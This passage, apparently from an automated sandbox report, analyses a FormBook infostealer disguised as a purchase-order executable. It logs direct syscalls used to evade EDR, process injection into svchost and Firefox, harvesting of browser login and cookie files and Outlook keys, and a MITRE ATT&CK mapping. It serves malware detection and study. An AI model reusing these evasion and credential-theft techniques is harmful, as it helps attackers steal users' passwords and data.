Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]	2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]	2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]	2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]	2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]	2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]	2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]	2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]	2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]	2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034309AD mov eax, dword ptr fs:[00000030h]	2_2_034309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034309AD mov eax, dword ptr fs:[00000030h]	2_2_034309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B89B3 mov esi, dword ptr fs:[00000030h]	2_2_034B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B89B3 mov eax, dword ptr fs:[00000030h]	2_2_034B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B89B3 mov eax, dword ptr fs:[00000030h]	2_2_034B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03442840 mov ecx, dword ptr fs:[00000030h]	2_2_03442840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03460854 mov eax, dword ptr fs:[00000030h]	2_2_03460854
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03434859 mov eax, dword ptr fs:[00000030h]	2_2_03434859
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03434859 mov eax, dword ptr fs:[00000030h]	2_2_03434859
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034BE872 mov eax, dword ptr fs:[00000030h]	2_2_034BE872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034BE872 mov eax, dword ptr fs:[00000030h]	2_2_034BE872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C6870 mov eax, dword ptr fs:[00000030h]	2_2_034C6870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C6870 mov eax, dword ptr fs:[00000030h]	2_2_034C6870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034BC810 mov eax, dword ptr fs:[00000030h]	2_2_034BC810
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03452835 mov eax, dword ptr fs:[00000030h]	2_2_03452835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03452835 mov eax, dword ptr fs:[00000030h]	2_2_03452835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03452835 mov eax, dword ptr fs:[00000030h]	2_2_03452835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03452835 mov ecx, dword ptr fs:[00000030h]	2_2_03452835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03452835 mov eax, dword ptr fs:[00000030h]	2_2_03452835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03452835 mov eax, dword ptr fs:[00000030h]	2_2_03452835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346A830 mov eax, dword ptr fs:[00000030h]	2_2_0346A830
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D483A mov eax, dword ptr fs:[00000030h]	2_2_034D483A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D483A mov eax, dword ptr fs:[00000030h]	2_2_034D483A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345E8C0 mov eax, dword ptr fs:[00000030h]	2_2_0345E8C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FA8E4 mov eax, dword ptr fs:[00000030h]	2_2_034FA8E4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346C8F9 mov eax, dword ptr fs:[00000030h]	2_2_0346C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346C8F9 mov eax, dword ptr fs:[00000030h]	2_2_0346C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03430887 mov eax, dword ptr fs:[00000030h]	2_2_03430887
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034BC89D mov eax, dword ptr fs:[00000030h]	2_2_034BC89D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B4F40 mov eax, dword ptr fs:[00000030h]	2_2_034B4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B4F40 mov eax, dword ptr fs:[00000030h]	2_2_034B4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B4F40 mov eax, dword ptr fs:[00000030h]	2_2_034B4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B4F40 mov eax, dword ptr fs:[00000030h]	2_2_034B4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D4F42 mov eax, dword ptr fs:[00000030h]	2_2_034D4F42
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342CF50 mov eax, dword ptr fs:[00000030h]	2_2_0342CF50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342CF50 mov eax, dword ptr fs:[00000030h]	2_2_0342CF50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342CF50 mov eax, dword ptr fs:[00000030h]	2_2_0342CF50

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe

Code function: 0_2_002480A9 GetTokenInformation,GetLastError,GetProcessHeap,RtlAllocateHeap,GetTokenInformation,

0_2_002480A9

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_0021A124 SetUnhandledExceptionFilter,		0_2_0021A124
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_0021A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_0021A155

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\icdXyWuAyJnWdEehZVgBNzwKPufdgyZLhzlmgGpOzlSDBcFbAxiDqIlxZDljE\KNMXQQ8gZH4SSEbWc22OgT.exe	NtDeviceIoControlFile: Direct from: 0x77012AEC	Jump to behavior
Source: C:\Program Files (x86)\icdXyWuAyJnWdEehZVgBNzwKPufdgyZLhzlmgGpOzlSDBcFbAxiDqIlxZDljE\KNMXQQ8gZH4SSEbWc22OgT.exe	NtQueryValueKey: Direct from: 0x77012BEC	Jump to behavior
Source: C:\Program Files (x86)\icdXyWuAyJnWdEehZVgBNzwKPufdgyZLhzlmgGpOzlSDBcFbAxiDqIlxZDljE\KNMXQQ8gZH4SSEbWc22OgT.exe	NtAllocateVirtualMemory: Direct from: 0x770148EC	Jump to behavior
Source: C:\Program Files (x86)\icdXyWuAyJnWdEehZVgBNzwKPufdgyZLhzlmgGpOzlSDBcFbAxiDqIlxZDljE\KNMXQQ8gZH4SSEbWc22OgT.exe	NtSetInformationThread: Direct from: 0x77012B4C	Jump to behavior
Source: C:\Program Files (x86)\icdXyWuAyJnWdEehZVgBNzwKPufdgyZLhzlmgGpOzlSDBcFbAxiDqIlxZDljE\KNMXQQ8gZH4SSEbWc22OgT.exe	NtQueryAttributesFile: Direct from: 0x77012E6C	Jump to behavior
Source: C:\Program Files (x86)\icdXyWuAyJnWdEehZVgBNzwKPufdgyZLhzlmgGpOzlSDBcFbAxiDqIlxZDljE\KNMXQQ8gZH4SSEbWc22OgT.exe	NtQueryVolumeInformationFile: Direct from: 0x77012F2C	Jump to behavior
Source: C:\Program Files (x86)\icdXyWuAyJnWdEehZVgBNzwKPufdgyZLhzlmgGpOzlSDBcFbAxiDqIlxZDljE\KNMXQQ8gZH4SSEbWc22OgT.exe	NtOpenSection: Direct from: 0x77012E0C	Jump to behavior
Source: C:\Program Files (x86)\icdXyWuAyJnWdEehZVgBNzwKPufdgyZLhzlmgGpOzlSDBcFbAxiDqIlxZDljE\KNMXQQ8gZH4SSEbWc22OgT.exe	NtQuerySystemInformation: Direct from: 0x770148CC	Jump to behavior
Source: C:\Program Files (x86)\icdXyWuAyJnWdEehZVgBNzwKPufdgyZLhzlmgGpOzlSDBcFbAxiDqIlxZDljE\KNMXQQ8gZH4SSEbWc22OgT.exe	NtOpenKeyEx: Direct from: 0x77012B9C	Jump to behavior
Source: C:\Program Files (x86)\icdXyWuAyJnWdEehZVgBNzwKPufdgyZLhzlmgGpOzlSDBcFbAxiDqIlxZDljE\KNMXQQ8gZH4SSEbWc22OgT.exe	NtProtectVirtualMemory: Direct from: 0x77012F9C	Jump to behavior
Source: C:\Program Files (x86)\icdXyWuAyJnWdEehZVgBNzwKPufdgyZLhzlmgGpOzlSDBcFbAxiDqIlxZDljE\KNMXQQ8gZH4SSEbWc22OgT.exe	NtCreateFile: Direct from: 0x77012FEC	Jump to behavior
Source: C:\Program Files (x86)\icdXyWuAyJnWdEehZVgBNzwKPufdgyZLhzlmgGpOzlSDBcFbAxiDqIlxZDljE\KNMXQQ8gZH4SSEbWc22OgT.exe	NtOpenFile: Direct from: 0x77012DCC	Jump to behavior
Source: C:\Program Files (x86)\icdXyWuAyJnWdEehZVgBNzwKPufdgyZLhzlmgGpOzlSDBcFbAxiDqIlxZDljE\KNMXQQ8gZH4SSEbWc22OgT.exe	NtQueryInformationToken: Direct from: 0x77012CAC	Jump to behavior
Source: C:\Program Files (x86)\icdXyWuAyJnWdEehZVgBNzwKPufdgyZLhzlmgGpOzlSDBcFbAxiDqIlxZDljE\KNMXQQ8gZH4SSEbWc22OgT.exe	NtTerminateThread: Direct from: 0x77012FCC	Jump to behavior
Source: C:\Program Files (x86)\icdXyWuAyJnWdEehZVgBNzwKPufdgyZLhzlmgGpOzlSDBcFbAxiDqIlxZDljE\KNMXQQ8gZH4SSEbWc22OgT.exe	NtProtectVirtualMemory: Direct from: 0x77007B2E	Jump to behavior
Source: C:\Program Files (x86)\icdXyWuAyJnWdEehZVgBNzwKPufdgyZLhzlmgGpOzlSDBcFbAxiDqIlxZDljE\KNMXQQ8gZH4SSEbWc22OgT.exe	NtAllocateVirtualMemory: Direct from: 0x77012BFC	Jump to behavior
Source: C:\Program Files (x86)\icdXyWuAyJnWdEehZVgBNzwKPufdgyZLhzlmgGpOzlSDBcFbAxiDqIlxZDljE\KNMXQQ8gZH4SSEbWc22OgT.exe	NtReadFile: Direct from: 0x77012ADC	Jump to behavior
Source: C:\Program Files (x86)\icdXyWuAyJnWdEehZVgBNzwKPufdgyZLhzlmgGpOzlSDBcFbAxiDqIlxZDljE\KNMXQQ8gZH4SSEbWc22OgT.exe	NtNotifyChangeKey: Direct from: 0x77013C2C	Jump to behavior
Source: C:\Program Files (x86)\icdXyWuAyJnWdEehZVgBNzwKPufdgyZLhzlmgGpOzlSDBcFbAxiDqIlxZDljE\KNMXQQ8gZH4SSEbWc22OgT.exe	NtCreateMutant: Direct from: 0x770135CC	Jump to behavior
Source: C:\Program Files (x86)\icdXyWuAyJnWdEehZVgBNzwKPufdgyZLhzlmgGpOzlSDBcFbAxiDqIlxZDljE\KNMXQQ8gZH4SSEbWc22OgT.exe	NtSetInformationProcess: Direct from: 0x77012C5C	Jump to behavior
Source: C:\Program Files (x86)\icdXyWuAyJnWdEehZVgBNzwKPufdgyZLhzlmgGpOzlSDBcFbAxiDqIlxZDljE\KNMXQQ8gZH4SSEbWc22OgT.exe	NtResumeThread: Direct from: 0x770136AC	Jump to behavior
Source: C:\Program Files (x86)\icdXyWuAyJnWdEehZVgBNzwKPufdgyZLhzlmgGpOzlSDBcFbAxiDqIlxZDljE\KNMXQQ8gZH4SSEbWc22OgT.exe	NtSetInformationThread: Direct from: 0x770063F9	Jump to behavior
Source: C:\Program Files (x86)\icdXyWuAyJnWdEehZVgBNzwKPufdgyZLhzlmgGpOzlSDBcFbAxiDqIlxZDljE\KNMXQQ8gZH4SSEbWc22OgT.exe	NtWriteVirtualMemory: Direct from: 0x77012E3C	Jump to behavior
Source: C:\Program Files (x86)\icdXyWuAyJnWdEehZVgBNzwKPufdgyZLhzlmgGpOzlSDBcFbAxiDqIlxZDljE\KNMXQQ8gZH4SSEbWc22OgT.exe	NtMapViewOfSection: Direct from: 0x77012D1C	Jump to behavior
Source: C:\Program Files (x86)\icdXyWuAyJnWdEehZVgBNzwKPufdgyZLhzlmgGpOzlSDBcFbAxiDqIlxZDljE\KNMXQQ8gZH4SSEbWc22OgT.exe	NtOpenKeyEx: Direct from: 0x77013C9C	Jump to behavior
Source: C:\Program Files (x86)\icdXyWuAyJnWdEehZVgBNzwKPufdgyZLhzlmgGpOzlSDBcFbAxiDqIlxZDljE\KNMXQQ8gZH4SSEbWc22OgT.exe	NtWriteVirtualMemory: Direct from: 0x7701490C	Jump to behavior
Source: C:\Program Files (x86)\icdXyWuAyJnWdEehZVgBNzwKPufdgyZLhzlmgGpOzlSDBcFbAxiDqIlxZDljE\KNMXQQ8gZH4SSEbWc22OgT.exe	NtClose: Direct from: 0x77012B6C
Source: C:\Program Files (x86)\icdXyWuAyJnWdEehZVgBNzwKPufdgyZLhzlmgGpOzlSDBcFbAxiDqIlxZDljE\KNMXQQ8gZH4SSEbWc22OgT.exe	NtReadVirtualMemory: Direct from: 0x77012E8C	Jump to behavior
Source: C:\Program Files (x86)\icdXyWuAyJnWdEehZVgBNzwKPufdgyZLhzlmgGpOzlSDBcFbAxiDqIlxZDljE\KNMXQQ8gZH4SSEbWc22OgT.exe	NtCreateKey: Direct from: 0x77012C6C	Jump to behavior
Source: C:\Program Files (x86)\icdXyWuAyJnWdEehZVgBNzwKPufdgyZLhzlmgGpOzlSDBcFbAxiDqIlxZDljE\KNMXQQ8gZH4SSEbWc22OgT.exe	NtDelayExecution: Direct from: 0x77012DDC	Jump to behavior
Source: C:\Program Files (x86)\icdXyWuAyJnWdEehZVgBNzwKPufdgyZLhzlmgGpOzlSDBcFbAxiDqIlxZDljE\KNMXQQ8gZH4SSEbWc22OgT.exe	NtQuerySystemInformation: Direct from: 0x77012DFC	Jump to behavior
Source: C:\Program Files (x86)\icdXyWuAyJnWdEehZVgBNzwKPufdgyZLhzlmgGpOzlSDBcFbAxiDqIlxZDljE\KNMXQQ8gZH4SSEbWc22OgT.exe	NtQueryInformationProcess: Direct from: 0x77012C26	Jump to behavior
Source: C:\Program Files (x86)\icdXyWuAyJnWdEehZVgBNzwKPufdgyZLhzlmgGpOzlSDBcFbAxiDqIlxZDljE\KNMXQQ8gZH4SSEbWc22OgT.exe	NtResumeThread: Direct from: 0x77012FBC	Jump to behavior
Source: C:\Program Files (x86)\icdXyWuAyJnWdEehZVgBNzwKPufdgyZLhzlmgGpOzlSDBcFbAxiDqIlxZDljE\KNMXQQ8gZH4SSEbWc22OgT.exe	NtCreateUserProcess: Direct from: 0x7701371C	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Program Files (x86)\icdXyWuAyJnWdEehZVgBNzwKPufdgyZLhzlmgGpOzlSDBcFbAxiDqIlxZDljE\KNMXQQ8gZH4SSEbWc22OgT.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\HOSTNAME.EXE protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Section loaded: NULL target: C:\Program Files (x86)\icdXyWuAyJnWdEehZVgBNzwKPufdgyZLhzlmgGpOzlSDBcFbAxiDqIlxZDljE\KNMXQQ8gZH4SSEbWc22OgT.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Section loaded: NULL target: C:\Program Files (x86)\icdXyWuAyJnWdEehZVgBNzwKPufdgyZLhzlmgGpOzlSDBcFbAxiDqIlxZDljE\KNMXQQ8gZH4SSEbWc22OgT.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\HOSTNAME.EXE

Thread register set: target process: 356

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\HOSTNAME.EXE

Thread APC queued: target process: C:\Program Files (x86)\icdXyWuAyJnWdEehZVgBNzwKPufdgyZLhzlmgGpOzlSDBcFbAxiDqIlxZDljE\KNMXQQ8gZH4SSEbWc22OgT.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 29B4008

Jump to behavior

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe

Code function: 0_2_002487B1 LogonUserW,

0_2_002487B1

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe

Code function: 0_2_001F3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_001F3B3A

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe

Code function: 0_2_001F48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,

0_2_001F48D7

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe

Code function: 0_2_00254C27 mouse_event,

0_2_00254C27

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe"	Jump to behavior
Source: C:\Program Files (x86)\icdXyWuAyJnWdEehZVgBNzwKPufdgyZLhzlmgGpOzlSDBcFbAxiDqIlxZDljE\KNMXQQ8gZH4SSEbWc22OgT.exe	Process created: C:\Windows\SysWOW64\HOSTNAME.EXE "C:\Windows\SysWOW64\HOSTNAME.EXE"	Jump to behavior
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe

Code function: 0_2_00247CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_00247CAF

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe

Code function: 0_2_0024874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_0024874B

Source: PURCHASE ORDER N0259305-06SN.exe, 00000000.00000002.1043576164.00000000002A4000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: PURCHASE ORDER N0259305-06SN.exe, KNMXQQ8gZH4SSEbWc22OgT.exe, 00000009.00000000.1273636581.0000000001AC0000.00000002.00000001.00040000.00000000.sdmp, KNMXQQ8gZH4SSEbWc22OgT.exe, 00000009.00000002.3493369450.0000000001AC0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: KNMXQQ8gZH4SSEbWc22OgT.exe, 00000009.00000000.1273636581.0000000001AC0000.00000002.00000001.00040000.00000000.sdmp, KNMXQQ8gZH4SSEbWc22OgT.exe, 00000009.00000002.3493369450.0000000001AC0000.00000002.00000001.00040000.00000000.sdmp, KNMXQQ8gZH4SSEbWc22OgT.exe, 0000000D.00000000.1420412672.0000000000F20000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: KNMXQQ8gZH4SSEbWc22OgT.exe, 00000009.00000000.1273636581.0000000001AC0000.00000002.00000001.00040000.00000000.sdmp, KNMXQQ8gZH4SSEbWc22OgT.exe, 00000009.00000002.3493369450.0000000001AC0000.00000002.00000001.00040000.00000000.sdmp, KNMXQQ8gZH4SSEbWc22OgT.exe, 0000000D.00000000.1420412672.0000000000F20000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: ?Program Manager
Source: KNMXQQ8gZH4SSEbWc22OgT.exe, 00000009.00000000.1273636581.0000000001AC0000.00000002.00000001.00040000.00000000.sdmp, KNMXQQ8gZH4SSEbWc22OgT.exe, 00000009.00000002.3493369450.0000000001AC0000.00000002.00000001.00040000.00000000.sdmp, KNMXQQ8gZH4SSEbWc22OgT.exe, 0000000D.00000000.1420412672.0000000000F20000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe

Code function: 0_2_0021862B cpuid

0_2_0021862B

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe

Code function: 0_2_00224E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00224E87

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe

Code function: 0_2_00231E06 GetUserNameW,

0_2_00231E06

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe

Code function: 0_2_00223F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_00223F3A

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe

Code function: 0_2_001F49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_001F49A0

Binary or memory string: procmon.exe

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.3494046989.0000000003660000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1348873063.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1353670483.0000000005900000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3492124439.00000000032B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3494131195.00000000036B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3494078242.0000000003190000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1352817809.00000000037A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\HOSTNAME.EXE	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\HOSTNAME.EXE

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Source: PURCHASE ORDER N0259305-06SN.exe	Binary or memory string: WIN_81
Source: PURCHASE ORDER N0259305-06SN.exe	Binary or memory string: WIN_XP
Source: PURCHASE ORDER N0259305-06SN.exe	Binary or memory string: WIN_XPe
Source: PURCHASE ORDER N0259305-06SN.exe	Binary or memory string: WIN_VISTA
Source: PURCHASE ORDER N0259305-06SN.exe	Binary or memory string: WIN_7
Source: PURCHASE ORDER N0259305-06SN.exe	Binary or memory string: WIN_8
Source: PURCHASE ORDER N0259305-06SN.exe, 00000000.00000002.1043576164.00000000002A4000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.3494046989.0000000003660000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1348873063.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1353670483.0000000005900000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3492124439.00000000032B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3494131195.00000000036B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3494078242.0000000003190000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1352817809.00000000037A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00266283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,		0_2_00266283
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00266747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_00266747

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	2 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Valid Accounts	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
